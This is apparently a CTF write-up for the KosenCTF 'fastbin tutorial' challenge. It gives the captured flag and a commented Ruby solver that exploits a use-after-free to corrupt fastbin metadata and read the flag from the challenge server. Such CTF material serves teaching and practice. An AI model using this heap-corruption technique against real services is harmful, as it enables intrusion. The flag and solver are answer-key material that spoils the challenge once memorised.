fastbin tutorial
FLAG{KosenCTF{y0ur_n3xt_g0al_is_t0_und3rst4nd_fastbin_corruption_attack_m4yb3}
Exploit
code:exploit.rb
# Solver script for the "fastbin tutorial" challenge (KosenCTF). It talks to
# the remote service over a socket through the pwntools-style 'pwn' gem
# (Sock, p64, context) and replays a fixed menu dialogue: every send is
# paired with a recvuntil ">" that consumes the next prompt, so the order of
# the lines below *is* the protocol and must not be reshuffled.
#
# Defender's reading of what the dialogue relies on: the service keeps using
# an entry (menu option 4 on "A") after that entry has been freed (option 2
# on "A"), i.e. a use-after-free. Per the author's note below, the write
# lands on the freed chunk's linked-list metadata. On the service side this
# is fixed by clearing the pointer on free and refusing operations on freed
# entries; current glibc also hardens fastbin handling, so the exact
# sequence here is specific to the challenge binary.
require 'pwn'
context.arch = 'amd64'        # target architecture for the pwntools helpers
# context.log_level = :debug  # uncomment to trace every send/recv
s = Sock.new 'pwn.kosenctf.com', 9001  # challenge host and port as given in the writeup

# The banner contains "located at <hex>." — the hex text up to the next "."
# is parsed as an address. The author calls it flag_addr; presumably the
# address of the in-memory flag buffer (TODO confirm against the binary).
s.recvuntil "located at "
flag_addr = s.recvuntil(".").hex

# Menu dialogue. Each "N\nX\n" answers the menu with option N and a name X;
# each puts echoes the service output up to the next ">" prompt. The option
# meanings are not visible in this listing and are inferred from the order
# alone: 1 looks like create, 2 like free, 4 like edit, 3 like show.
puts s.recvuntil ">"
s.send "1\nA\n"       # create A (inferred)
puts s.recvuntil ">"
s.send "1\nB\n"       # create B (inferred)
puts s.recvuntil ">"
s.send "2\nB\n"       # free B (inferred)
puts s.recvuntil ">"
s.send "2\nA\n"       # free A (inferred) — both entries are now freed
puts s.recvuntil ">"
s.send "4\nA\n"       # edit A after it was freed: the use-after-free the author relies on
puts s.recvuntil ">"
# 16-byte payload: eight zero bytes, then flag_addr as a little-endian
# 64-bit value, then the newline the service reads input up to.
# Author's note (translated from Japanese): "use after free; sending only
# flag_addr made it complain about some overhead, so I disguised the first
# field as the end of the linked list (nullptr) and overwrote the string
# pointer or something like that."
s.send "#{p64(0)}#{p64(flag_addr)}\n"
puts s.recvuntil ">"
s.send "1\nA\n"       # create again; new entries come back from the corrupted free list (inferred)
puts s.recvuntil ">"
s.send "1\nB\n"
puts s.recvuntil ">"
s.send "1\nC\n"       # C is presumably the entry whose string pointer now equals flag_addr — TODO confirm
puts s.recvuntil ">"
s.send "3\nC\n"       # show C; the response is not read within this listing (the page may continue past here)